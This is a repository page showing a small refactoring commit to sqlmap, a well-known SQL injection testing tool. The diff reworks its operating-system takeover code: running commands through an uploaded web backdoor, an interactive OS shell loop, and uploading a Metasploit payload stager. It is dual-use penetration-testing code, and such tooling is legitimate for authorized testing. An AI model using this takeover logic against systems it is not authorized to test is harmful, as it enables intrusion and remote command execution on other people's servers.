sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-05-10 10:43:44 +03:00
Code Issues Packages Projects Releases Wiki Activity

Minor code refactoring

Browse Source
This commit is contained in:
Bernardo Damele 2010-01-14 14:33:08 +00:00
parent 070ccc30e9
commit c9863bc1d2
3 changed files with 87 additions and 118 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
lib/takeover/abstraction.py
View File

@ -60,7 +60,7 @@ class Abstraction(Web, UDF, xp_cmdshell):
def execCmd(self, cmd, silent=False, forgeCmd=False): def execCmd(self, cmd, silent=False, forgeCmd=False):
if self.webBackdoorUrl and not kb.stackedTest: if self.webBackdoorUrl and not kb.stackedTest:
self.webBackdoorRunCmd(cmd, silent=True) self.webBackdoorRunCmd(cmd)
elif kb.dbms in ( "MySQL", "PostgreSQL" ): elif kb.dbms in ( "MySQL", "PostgreSQL" ):
self.udfExecCmd(cmd, silent=silent) self.udfExecCmd(cmd, silent=silent)
@ -73,7 +73,10 @@ class Abstraction(Web, UDF, xp_cmdshell):
raise sqlmapUnsupportedFeatureException, errMsg raise sqlmapUnsupportedFeatureException, errMsg
def evalCmd(self, cmd, first=None, last=None): def evalCmd(self, cmd, first=None, last=None):
if kb.dbms in ( "MySQL", "PostgreSQL" ): if self.webBackdoorUrl and not kb.stackedTest:
return self.webBackdoorRunCmd(cmd)
elif kb.dbms in ( "MySQL", "PostgreSQL" ):
return self.udfEvalCmd(cmd, first, last) return self.udfEvalCmd(cmd, first, last)
elif kb.dbms == "Microsoft SQL Server": elif kb.dbms == "Microsoft SQL Server":
@ -103,7 +106,13 @@ class Abstraction(Web, UDF, xp_cmdshell):
if not conf.osShell and not conf.osPwn and not conf.cleanup: if not conf.osShell and not conf.osPwn and not conf.cleanup:
self.__cmdShellCleanup() self.__cmdShellCleanup()
def absOsShell(self): def shell(self):
if self.webBackdoorUrl and not kb.stackedTest:
infoMsg = "calling OS shell. To quit type "
infoMsg += "'x' or 'q' and press ENTER"
logger.info(infoMsg)
else:
if kb.dbms in ( "MySQL", "PostgreSQL" ): if kb.dbms in ( "MySQL", "PostgreSQL" ):
infoMsg = "going to use injected sys_eval and sys_exec " infoMsg = "going to use injected sys_eval and sys_exec "
infoMsg += "user-defined functions for operating system " infoMsg += "user-defined functions for operating system "

40
lib/takeover/web.py
View File

@ -53,7 +53,7 @@ class Web:
self.webUploaderUrl = None self.webUploaderUrl = None
self.webDirectories = set() self.webDirectories = set()
def webBackdoorRunCmd(self, cmd, silent=False): def webBackdoorRunCmd(self, cmd):
if self.webBackdoorUrl is None: if self.webBackdoorUrl is None:
return return
@ -68,47 +68,11 @@ class Web:
if page is not None: if page is not None:
output = re.search("<pre>(.+?)</pre>", page, re.I | re.S) output = re.search("<pre>(.+?)</pre>", page, re.I | re.S)
if not silent:
if output: if output:
print output.group(1) output = output.group(1)
else:
print "No output"
return output return output
def webBackdoorShell(self):
if self.webBackdoorUrl is None:
return
infoMsg = "calling OS shell. To quit type "
infoMsg += "'x' or 'q' and press ENTER"
logger.info(infoMsg)
autoCompletion(osShell=True)
while True:
command = None
try:
command = raw_input("os-shell> ")
except KeyboardInterrupt:
print
errMsg = "user aborted"
logger.error(errMsg)
except EOFError:
print
errMsg = "exit"
logger.error(errMsg)
break
if not command:
continue
if command.lower() in ( "x", "q", "exit", "quit" ):
break
self.webBackdoorRunCmd(command)
def webFileUpload(self, fileToUpload, destFileName, directory): def webFileUpload(self, fileToUpload, destFileName, directory):
if self.webApi == "php": if self.webApi == "php":
multipartParams = { multipartParams = {

16
plugins/generic/takeover.py
View File

@ -84,9 +84,9 @@ class Takeover(Abstraction, Metasploit, Registry):
logger.info(infoMsg) logger.info(infoMsg)
self.webInit() self.webInit()
self.webBackdoorRunCmd(conf.osCmd)
else: else:
self.initEnv() self.initEnv()
self.runCmd(conf.osCmd) self.runCmd(conf.osCmd)
def osShell(self): def osShell(self):
@ -97,12 +97,14 @@ class Takeover(Abstraction, Metasploit, Registry):
logger.info(infoMsg) logger.info(infoMsg)
self.webInit() self.webInit()
self.webBackdoorShell()
else: else:
self.initEnv() self.initEnv()
self.absOsShell()
self.shell()
def osPwn(self): def osPwn(self):
goUdf = False
stackedTest() stackedTest()
if not kb.stackedTest: if not kb.stackedTest:
@ -116,16 +118,10 @@ class Takeover(Abstraction, Metasploit, Registry):
self.getRemoteTempPath() self.getRemoteTempPath()
self.createMsfPayloadStager() self.createMsfPayloadStager()
self.uploadMsfPayloadStager(web=True) self.uploadMsfPayloadStager(web=True)
else:
self.pwn()
return
self.initEnv() self.initEnv()
self.getRemoteTempPath() self.getRemoteTempPath()
goUdf = False
if kb.dbms in ( "MySQL", "PostgreSQL" ): if kb.dbms in ( "MySQL", "PostgreSQL" ):
msg = "how do you want to execute the Metasploit shellcode " msg = "how do you want to execute the Metasploit shellcode "
msg += "on the back-end database underlying operating system?" msg += "on the back-end database underlying operating system?"